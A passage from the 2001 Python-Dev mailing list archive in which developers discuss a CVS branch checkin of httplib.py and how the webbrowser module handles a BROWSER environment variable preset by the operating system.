    Fred>         cd .../Lib/
    Fred>         cvs diff -r1.34.2.1 -r1.34 httplib.py | patch

    Fred> and commit the new version as 1.34.2.2:

    Fred>         cvs commit -m 'unmuff...' httplib.py

Functionally, the checkin isn't a muff (it does have the change I intended),
but I was worried about the version number.  Should I have checked it in as
version 1.34.2.1 or 1.35?

Skip


From fdrake at acm.org  Thu May 31 23:00:34 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Thu, 31 May 2001 17:00:34 -0400 (EDT)
Subject: [Python-Dev] weird webbrowser behavior
In-Reply-To: <15126.41505.987887.477670@beluga.mojam.com>
References: <15126.41505.987887.477670@beluga.mojam.com>
	<20010531160821.A10314@thyrsus.com>
Message-ID: <15126.45298.666556.20710@cj42289-a.reston1.va.home.com>

Skip Montanaro writes:
 > or try to register them using GenericBrowser.  Users are apparently not the
 > only people setting BROWSER, so the comment in the code:
 > 
 >     # It's the user's responsibility to register handlers for any unknown
 >     # browser referenced by this value, before calling open().
 > 
 > seems like flawed logic to me.

Eric S. Raymond writes:
 > Fred Drake and I are co-responsible for that code.  If you want to patch it
 > to do this, I won't object.

  I wouldn't object either.  I *do* object to the system setting that
variable by default by either Mandrake or Gnome -- that's just stupid
and inconsiderate of the user.
  Now, if anyone can provide support for Nautilis, I won't object to
that either.  Unfortunately, Mandrake's installer stinks at upgrading
(it couldn't seem to locate my 7.2 installation) and I don't have the
time to figure that out.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From fdrake at acm.org  Thu May 31 23:04:30 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Thu, 31 May 2001 17:04:30 -0400 (EDT)
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
In-Reply-To: <15126.44584.300357.360209@beluga.mojam.com>
References: <15126.34825.167026.520535@beluga.mojam.com>
	<15126.42770.17954.452663@cj42289-a.reston1.va.home.com>
	<15126.44584.300357.360209@beluga.mojam.com>
Message-ID: <15126.45534.417066.445852@cj42289-a.reston1.va.home.com>

Skip Montanaro writes:
 > Functionally, the checkin isn't a muff (it does have the change I intended),
 > but I was worried about the version number.  Should I have checked it in as
 > version 1.34.2.1 or 1.35?

  If the change should happen on the branch, leave it in.  If it's
also needed on the HEAD, check it in again there, and you're done.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations